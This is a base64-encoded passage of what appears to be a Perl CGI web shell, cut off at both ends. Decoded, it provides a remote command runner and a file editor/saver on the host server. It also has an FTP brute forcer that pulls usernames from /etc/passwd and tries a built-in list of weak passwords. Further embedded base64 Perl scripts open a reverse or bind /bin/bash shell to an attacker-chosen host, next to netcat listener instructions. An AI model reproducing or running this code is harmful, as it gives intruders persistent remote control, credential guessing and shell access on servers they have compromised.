XJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvbXAoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsNCgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCQkkcmVzdWx0IC49ICJDb21tYW5kOiA8cnVuPiRSdW5Db21tYW5kIDwvcnVuPjxicj48dGV4dGFyZWEgY29scz0nJGNvbHMnIHJvd3M9JyRyb3dzJyBzcGVsbGNoZWNrPSdmYWxzZSc+IjsNCgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQ0KCQkkUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSI7DQoJCSRyZXN1bHQgLj0gJlJ1bkNtZDsNCgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQ0KCXsNCgkJJHJlc3VsdCAuPSAgJlNhdmVGaWxlRm9ybTsNCgl9ZWxzZQ0KCXsNCgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7DQoJCSRyZXN1bHQgLj0mUnVuQ21kOw0KCX0NCgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOw0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBydW4gY29tbWFuZA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJ1bkNtZA0Kew0KCW15ICRyZXN1bHQ9IiI7DQoJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOw0KCWlmKCEkV2luTlQpDQoJew0KCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0Ow0KCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJfQ0KCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQNCgl7DQoJCSR8PTE7DQoJCSRDb21tYW5kIC49ICIgfCI7DQoJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pDQoJCXsNCgkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOw0KCQl9DQoJCSR8PTA7DQoJfQ0KCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcw0KCXsNCgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygkQ29tbWFuZCk7DQoJfQ0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIEZvcm0gU2F2ZSBGaWxlIA0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIFNhdmVGaWxlRm9ybQ0Kew0KCW15ICRyZXN1bHQgPSIiOw0KCSRFbmNvZGVDdXJyZW50RGlyID0gRW5jb2RlRGlyKCRDdXJyZW50RGlyKTsNCglzdWJzdHIoJFJ1bkNvbW1hbmQsMCw1KT0iIjsNCglteSAkZmlsZT0mdHJpbSgkUnVuQ29tbWFuZCk7DQoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgPic7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFJ1bkNvbW1hbmQ7DQoJbXkgJGRpcj0iPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJndWkiKS4iPC9zcGFuPiI7DQoJaWYoLXcgJEZpbGUpDQoJew0KCQkkcm93cz0iMjMiDQoJfWVsc2UNCgl7DQoJCSRtc2c9Ijxicj48Zm9udCBzdHlsZT0nY29sb3I6IHllbGxvdzsnID4gQ2Fubid0IHdyaXRlIGZpbGUhPGZvbnQ+PGJyPiI7DQoJCSRyb3dzPSIyMCINCgl9DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOw0KCSRSdW5Db21tYW5kID0gImVkaXQgJFJ1bkNvbW1hbmQiOw0KCSRyZXN1bHQgLj0gIDw8RU5EOw0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQoJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRFbmNvZGVDdXJyZW50RGlyIj4NCgkkUHJvbXB0DQoJPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjQwIiBuYW1lPSJjIj4NCgk8aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPg0KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaWxlIiB2YWx1ZT0iJGZpbGUiID4gJHNhdmUgPGJyPiAkbXNnDQoJPGJyPjx0ZXh0YXJlYSBpZD0iZGF0YSIgbmFtZT0iZGF0YSIgY29scz0iJGNvbHMiIHJvd3M9IiRyb3dzIiBzcGVsbGNoZWNrPSJmYWxzZSI+DQpFTkQNCg0KCSRyZXN1bHQgLj0gJkh0bWxTcGVjaWFsQ2hhcnMoJkZpbGVPcGVuKCRGaWxlLDApKTsNCgkkcmVzdWx0IC49ICI8L3RleHRhcmVhPiI7DQoJJHJlc3VsdCAuPSAiPC9mb3JtPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIEZpbGUgT3Blbg0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIEZpbGVPcGVuKCQpew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJbXkgJGJpbmFyeSA9IHNoaWZ0Ow0KCW15ICRyZXN1bHQgPSAiIjsNCglteSAkbiA9ICIiOw0KCWlmKC1mICRmaWxlKXsNCgkJaWYob3BlbihGSUxFLCRmaWxlKSl7DQoJCQlpZigkYmluYXJ5KXsNCgkJCQliaW5tb2RlIEZJTEU7DQoJCQl9DQoJCQl3aGlsZSAoKCRuID0gcmVhZCBGSUxFLCAkZGF0YSwgMTAyNCkgIT0gMCkgew0KCQkJCSRyZXN1bHQgLj0gJGRhdGE7DQoJCQl9DQoJCQljbG9zZShGSUxFKTsNCgkJfQ0KCX1lbHNlDQoJew0KCQlyZXR1cm4gIk5vdCdzIGEgRmlsZSEiOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiMgU2F2ZSBGaWxlDQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpzdWIgU2F2ZUZpbGUoJCkNCnsNCglteSAkRGF0YT0gc2hpZnQgOw0KCW15ICRGaWxlPSBzaGlmdDsNCgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kRmlsZTsNCglpZihvcGVuKEZJTEUsICI+JEZpbGUiKSkNCgl7DQoJCWJpbm1vZGUgRklMRTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJcmV0dXJuIDE7DQoJfWVsc2UNCgl7DQoJCXJldHVybiAwOw0KCX0NCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQnJ1dGUgRm9yY2VyIEZvcm0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCcnV0ZUZvcmNlckZvcm0NCnsNCglteSAkcmVzdWx0PSIiOw0KCSRyZXN1bHQgLj0gPDxFTkQ7DQoNCjx0YWJsZT4NCg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjPGJyPg0KU2ltcGxlIEZUUCBicnV0ZSBmb3JjZXI8YnI+DQpOb3RlOiBPbmx5IHNjYW4gZnJvbSAxIHRvIDMgdXNlciA6LVM8YnI+DQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KDQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPlVzZXI6PGJyPjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InVzZXIiPg0KRU5EDQpjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOw0KJHJlc3VsdCAuPSA8PCdFTkQnOw0KPC90ZXh0YXJlYT48L3RkPg0KPHRkPg0KDQpQYXNzOjxicj4NCjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MNCjEyMyFAIw0KMTIzYWRtaW4NCjEyM2FiYw0KMTIzNDU2YWRtaW4NCjEyMzQ1NTQzMjENCjEyMzQ0MzIxDQpwYXNzMTIzDQphZG1pbg0KYWRtaW5jcA0KYWRtaW5pc3RyYXRvcg0KbWF0a2hhdQ0KcGFzc2FkbWluDQpwQHNzd29yZA0KcEBzc3cwcmQNCnBhc3N3b3JkDQoxMjM0NTYNCjEyMzQ1NjcNCjEyMzQ1Njc4DQoxMjM0NTY3ODkNCjEyMzQ1Njc4OTANCjExMTExMQ0KMDAwMDAwDQoyMjIyMjINCjMzMzMzMw0KNDQ0NDQ0DQo1NTU1NTUNCjY2NjY2Ng0KNzc3Nzc3DQo4ODg4ODgNCjk5OTk5OQ0KMTIzMTIzDQoyMzQyMzQNCjM0NTM0NQ0KNDU2NDU2DQo1Njc1NjcNCjY3ODY3OA0KNzg5Nzg5DQoxMjMzMjENCjQ1NjY1NA0KNjU0MzIxDQo3NjU0MzIxDQo4NzY1NDMyMQ0KOTg3NjU0MzIxDQowOTg3NjU0MzIxDQphZG1pbjEyMw0KYWRtaW4xMjM0NTYNCmFiY2RlZg0KYWJjYWJjDQohQCMhQCMNCiFAIyQlXg0KIUAjJCVeJiooDQohQCMkJCNAIQ0KYWJjMTIzDQphbmh5ZXVlbQ0KaWxvdmV5b3U8L3RleHRhcmVhPg0KPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYWxpZ249ImNlbnRlciI+DQpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4NCg0KPG9wdGlvbj4wPC9vcHRpb24+DQo8b3B0aW9uPjE8L29wdGlvbj4NCjxvcHRpb24+Mjwvb3B0aW9uPg0KDQo8b3B0aW9uPjM8L29wdGlvbj4NCjwvc2VsZWN0PiANCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCcnV0ZSBGb3JjZXIiLz48L3RkPjwvdHI+DQo8L2Zvcm0+DQo8L3RhYmxlPg0KRU5EDQpyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQnJ1dGUgRm9yY2VyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQnJ1dGVGb3JjZXINCnsNCglteSAkcmVzdWx0PSIiOw0KCSRTZXJ2ZXI9JEVOVnsnU0VSVkVSX0FERFInfTsNCglpZigkaW57J3VzZXInfSBlcSAiIikNCgl7DQoJCSRyZXN1bHQgLj0gJkJydXRlRm9yY2VyRm9ybTsNCgl9ZWxzZQ0KCXsNCgkJdXNlIE5ldDo6RlRQOyANCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsNCgkJQHBhc3M9IHNwbGl0KC9cbi8sICRpbnsncGFzcyd9KTsNCgkJY2hvbXAoQHVzZXIpOw0KCQljaG9tcChAcGFzcyk7DQoJCSRyZXN1bHQgLj0gIjxicj48YnI+WytdIFRyeWluZyBicnV0ZSAkU2VydmVyTmFtZTxicj49PT09PT09PT09PT09PT09PT09PT4+Pj4+Pj4+Pj4+Pjw8PDw8PDw8PDw9PT09PT09PT09PT09PT09PT09PTxicj48YnI+XG4iOw0KCQlmb3JlYWNoICR1c2VybmFtZSAoQHVzZXIpDQoJCXsNCgkJCWlmKCR1c2VybmFtZSBuZSAiIikNCgkJCXsNCgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpDQoJCQkJew0KCQkJCQkkZnRwID0gTmV0OjpGVFAtPm5ldygkU2VydmVyKSBvciBkaWUgIkNvdWxkIG5vdCBjb25uZWN0IHRvICRTZXJ2ZXJOYW1lXG4iOyANCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQ0KCQkJCQl7DQoJCQkJCQkkcmVzdWx0IC49ICI8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0nZnRwOi8vJHVzZXJuYW1lOiRwYXNzd29yZFxAJFNlcnZlcic+WytdIGZ0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXI8L2E+PGJyPlxuIjsNCgkJCQkJCSRmdHAtPnF1aXQoKTsNCgkJCQkJCWJyZWFrOw0KCQkJCQl9DQoJCQkJCWlmKCRpbnsnc2xlZXAnfSBuZSAiMCIpDQoJCQkJCXsNCgkJCQkJCXNsZWVwKGludCgkaW57J3NsZWVwJ30pICogMTAwMCk7DQoJCQkJCX0NCgkJCQkJJGZ0cC0+cXVpdCgpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmRGb3JtDQp7DQoJcmV0dXJuIDw8RU5EOw0KCTxicj48YnI+DQoNCgk8dGFibGU+DQoJPHRyPg0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPg0KCTx0ZD4gSG9zdDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjIwIiBuYW1lPSJjbGllbnRhZGRyIiB2YWx1ZT0iJEVOVnsnUkVNT1RFX0FERFInfSI+DQoJIFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI2IiBuYW1lPSJjbGllbnRwb3J0IiB2YWx1ZT0iODAiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiYScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+PC90ZD4NCg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJDb25uZWN0Ij48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIENsaWVudCBsaXN0ZW4gYmVmb3JlIGNvbm5lY3QgYmFjayENCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+DQoJPGJyPlsrXSBDbGllbnQgbGlzdGVuIHdpdGggY29tbWFuZDogPHJ1bj5uYyAtdnYgLWwgLXAgPHNwYW4gaWQ9ImJhIj44MDwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4NCg0KCTwvdHI+DQoJPC90YWJsZT4NCg0KCTxicj48YnI+DQoJPHRhYmxlPg0KCTx0cj4NCgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCgk8dGQ+QmluZCBQb3J0OiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYmFja2JpbmQiPjwvdGQ+DQoNCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+DQoNCgkgUGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxMiIgbmFtZT0iYmluZHBhc3MiIHZhbHVlPSJ2aW5ha2lkIj48L3RkPg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJCaW5kIj48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIFRlc3RpbmcgLi4uLg0KCTxicj5bK10gVHJ5IGNvbW1hbmQ6IDxydW4+bmMgJEVOVnsnU0VSVkVSX0FERFInfSA8c3BhbiBpZD0iYmkiPjE0MTI8L3NwYW4+PC9ydW4+PC9mb250PjwvdGQ+DQoNCgk8L3RyPg0KCTwvdGFibGU+PGJyPg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJhY2tjb25uZWN0IHVzZSBwZXJsDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmQNCnsNCgl1c2UgU29ja2V0OwkNCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7DQoJJGJpbmRwZXJsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRcDFjMlVnVTI5amEyVjBPdzBLSkVGU1IwTTlRRUZTUjFZN0RRb2tjRzl5ZEFrOUlDUkJVa2RXV3pCZE93MEtKSEJ5YjNSdkNUMGdaMlYwY0hKdmRHOWllVzVoYldVb0ozUmpjQ2NwT3cwS0pGTm9aV3hzQ1QwZ0lpOWlhVzR2WW1GemFDSTdEUXB6YjJOclpYUW9VMFZTVmtWU0xDQlFSbDlKVGtWVUxDQlRUME5MWDFOVVVrVkJUU3dnSkhCeWIzUnZLVzl5SUdScFpTQWljMjlqYTJWME9pUWhJanNOQ25ObGRITnZZMnR2Y0hRb1UwVlNWa1ZTTENCVFQweGZVMDlEUzBWVUxDQlRUMTlTUlZWVFJVRkVSRklzSUhCaFkyc29JbXdpTENBeEtTbHZjaUJrYVdVZ0luTmxkSE52WTJ0dmNIUTZJQ1FoSWpzTkNtSnBibVFvVTBWU1ZrVlNMQ0J6YjJOcllXUmtjbDlwYmlna2NHOXlkQ3dnU1U1QlJFUlNYMEZPV1NrcGIzSWdaR2xsSUNKaWFXNWtPaUFrSVNJN0RRcHNhWE4wWlc0b1UwVlNWa1ZTTENCVFQwMUJXRU5QVGs0cENRbHZjaUJrYVdVZ0lteHBjM1JsYmpvZ0pDRWlPdzBLWm05eUtEc2dKSEJoWkdSeUlEMGdZV05qWlhCMEtFTk1TVVZPVkN3Z1UwVlNWa1ZTS1RzZ1kyeHZjMlVnUTB4SlJVNVVLUTBLZXcwS0NXOXdaVzRvVTFSRVNVNHNJQ0krSmtOTVNVVk9WQ0lwT3cwS0NXOXdaVzRvVTFSRVQxVlVMQ0FpUGlaRFRFbEZUbFFpS1RzTkNnbHZjR1Z1S0ZOVVJFVlNVaXdnSWo0bVEweEpSVTVVSWlrN0RRb0pjM2x6ZEdWdEtDSjFibk5sZENCSVNWTlVSa2xNUlRzZ2RXNXpaWFFnVTBGV1JVaEpVMVFnTzJWamFHOGdKMXNyWFNCVGVYTjBaVzFwYm1adk9pQW5PeUIxYm1GdFpTQXRZVHRsWTJodk8yVmphRzhnSjFzclhTQlZjMlZ5YVc1bWJ6b2dKenNnYVdRN1pXTm9ienRsWTJodklDZGJLMTBnUkdseVpXTjBiM0o1T2lBbk95QndkMlE3WldOb2J6c2daV05vYnlBbld5dGRJRk5vWld4c09pQW5PeVJUYUdWc2JDSXBPdzBLQ1dOc2IzTmxLRk5VUkVsT0tUc05DZ2xqYkc5elpTaFRWRVJQVlZRcE93MEtDV05zYjNObEtGTlVSRVZTVWlrN0RRcDlEUW89IjsNCg0KCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307DQoJJENsaWVudFBvcnQgPSBpbnQoJGlueydjbGllbnRwb3J0J30pOw0KCWlmKCRDbGllbnRQb3J0IGVxIDApDQoJew0KCQlyZXR1cm4gJkJhY2tCaW5kRm9ybTsNCgl9ZWxzaWYoISRDbGllbnRBZGRyIGVxICIiKQ0KCXsNCgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmFja3BlcmwpOw0KCQlpZigtdyAiL3RtcC8iKQ0KCQl7DQoJCQkkRmlsZT0iL3RtcC9iYWNrY29ubmVjdC5wbCI7CQ0KCQl9ZWxzZQ0KCQl7DQoJCQkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4iYmFja2Nvbm5lY3QucGwiOw0KCQl9DQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlzeXN0ZW0oInBlcmwgJEZpbGUgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsNCgkJdW5saW5rKCRGaWxlKTsNCgkJZXhpdCAwOw0KCX1lbHNlDQoJew0KCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiaW5kcGVybCk7DQoJCWlmKC13ICIvdG1wIikNCgkJew0KCQkJJEZpbGU9Ii90bXAvYmluZHBvcnQucGwiOwkNCgkJfWVsc2UNCgkJew0KCQkJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuImJpbmRwb3J0LnBsIjsNCgkJfQ0KCQlvcGVuKEZJTEUsICI+JEZpbGUiKTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJc3lzdGVtKCJwZXJsICRGaWxlICRDbGllbnRQb3J0Iik7DQoJCXVubGluaygkRmlsZSk7DQoJCWV4aXQgMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojICBBcnJheSBMaXN0IERpcmVjdG9yeQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJtRGlyKCQpIA0Kew0KCW15ICRkaXIgPSBzaGlmdDsNCglpZihvcGVuZGlyKERJUiwkZGlyKSkNCgl7DQoJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKQ0KCQl7DQoJCQlpZigoJGZpbGUgbmUgIi4iKSAmJiAoJGZpbGUgbmUgIi4uIikpDQoJCQl7DQoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7DQoJCQkJaWYoLWQgJGZpbGUpDQoJCQkJew0KCQkJCQkmUm1EaXIoJGZpbGUpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQl1bmxpbmsoJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQljbG9zZWRpcihESVIpOw0KCX0NCn0NCnN1YiBGaWxlT3duZXIoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJKCR1aWQsJGdpZCkgPSA